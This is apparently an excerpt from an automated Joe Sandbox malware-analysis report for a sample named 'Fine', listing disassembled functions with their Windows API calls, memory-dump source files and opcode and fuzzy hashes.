                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3f83c35aba8725e00a86fa55f723b511ff989d94dd16d150a48f3847c9c659c1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 947a4f8832b43dd21aa643ff911a3148a8794cb7309bf43327b1fdcb5c10a613
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f83c35aba8725e00a86fa55f723b511ff989d94dd16d150a48f3847c9c659c1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14D0A935BA4304A6EAA8A370BC0FFD36A249B00B00F108820B60AAA0C0C8E068108A80
                                                                                                                                                                                                                                                                                                                            Function 00262DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00262E08
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000), ref: 00262E0F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023F292: Sleep.KERNEL32 ref: 0023F30A
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2efcfc70aaf31752f737d6978286ec389975941adb25cf4d56b6127b81d1d6be
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 38dbe86f8c9c7850cb317ec682f2fbf6162a6a59ed2eca4f0eeecd1519eddb29
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2efcfc70aaf31752f737d6978286ec389975941adb25cf4d56b6127b81d1d6be
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D0A931BE1304AAEAA8A370BC0FFC36A249B04B00F508820B606AA0C0C8E068108A84
                                                                                                                                                                                                                                                                                                                            Function 0020C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0020C213
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0020C221
                                                                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0020C27C
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9cc97484b61695b896f90d850c2a86ccd7ed4f4e300a7a653a91567ae8602e17
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 82e1aee632db664f64401dba0fa9e803858649ba72bec782be1be9135721db2b
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cc97484b61695b896f90d850c2a86ccd7ed4f4e300a7a653a91567ae8602e17
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A41F6B0620306EFDB219FE5C844ABA7BA5EF11320F34426AFC59975E2DB708C11CB60